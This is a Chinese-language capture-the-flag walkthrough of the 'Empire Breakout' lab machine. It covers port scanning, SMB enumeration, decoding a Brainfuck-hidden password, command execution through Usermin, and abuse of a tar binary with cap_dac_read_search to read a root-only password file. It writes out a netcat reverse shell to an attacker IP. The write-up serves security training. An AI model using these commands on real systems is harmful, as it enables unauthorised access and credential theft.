admin管理员组

文章数量:1794759

攻防靶场(21):EMPIRE BREAKOUT

1. 侦查 Reconnaissance

1.1 IP地址

部署好环境,直接看到IP地址:192.168.20.135

1.2 端口和服务

全端口扫描TCP协议,获得80、139、445、10000、20000端口

sudo nmap 192.168.20.135 -n -Pn -p- --reason

3. 初始访问 Initial Access

3.1 普通用户帐号

对139和445端口的smb服务进行信息收集

num4linux -a 192.168.20.135

有用的信息只有一个用户名:cyber

3.2 普通用户密码

访问80端口,查看源代码,得到一个字符串

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

放到网上一搜,是一种叫Brainfuck Language的编程语言

随便找个提供执行环境的网站,执行这串代码,输出了一个长得像密码的字符串:.2uqPEfj3D<P'a-3

3.3 web权限

帐号和密码都有了,现在就找登录框,进行密码喷洒攻击

10000端口是Webmin登录页,20000端口是Usermin登录页,最后就Usermin登录成功了

3.4 server权限

Usermin后台有服务器的命令执行环境,真是踏破铁鞋无觅处

查看当前目录下的文件,有个user.txt,里面是flag:3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

6. 权限提升 Privilege Escalation

6.1 特权用户密码

按照套路该提权了,查看当前目录下的文件,有个tar程序,有cap_dac_read_search权限,任何用户都能用该程序打包自己没有read权限的文件,这有什么用呢?

如果特权用户使用tar程序解包,解包后的文件属主将保持不变,原来是zabbix解包后还是zabbix

如果普通用户使用tar程序解包,解包后的文件属主将和普通用户一样,原来是root解包后就成了普通用户了,原来没权限看的文件现在就有权限看了

正常思路是查看/etc/shadow文件,然后爆破密钥获得root密码,但这里实在爆破不出来,过程就不截图了

其他思路是查看敏感文件,比如管理员的密码本。翻找服务器,发现一个/var/backups/.old_pass.bak文件,当前cyber用户没有read权限

先去一个有write权限的目录执行打包解包,比如/tmp/或/home/cyber/都行

相关命令是(下图黄色部分)

1、打包:/home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak

2、解包:/home/cyber/tar -xvf 1.tar(解包用/bin/tar是一样的)

3、查看:cat /tmp/var/backups/.old_pass.bak

相关权限是(下图红色部分)

1、未打包的文件:root/root

2、被打包的文件:root/root

3、解包后的文件:cyber/cyber

成功拿到了密码:Ts&4&YurgtRX(=~h

6.2 root权限(方式1)

但是Usermin限制了su命令的使用,无法切换到root,服务器也没开放22端口

先将shell权限反弹出来,摆脱Usermin的限制,再su切换用户试试

nc -nvlp 1234

nc -nv 192.168.20.132 1234 -e /bin/bash

成功su切换到root用户

6.3 root权限(方式2)

当然也能在Usermin中退出cyber帐号,再以root帐号登录,就能获得root权限了

在/root/目录下的rOOt.txt文件获得flag:3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

7. 攻击路径总结

公众号后台回复“20241025”获取该思维导图的.xmind格式源文件

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。原始发表:2024-10-24,如有侵权请联系 cloudcommunity@tencent 删除打包程序登录服务器权限

本文标签: 攻防靶场(21)EMPIRE BREAKOUT

版权声明:本文标题:攻防靶场(21):EMPIRE BREAKOUT 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1754623653a1704500.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。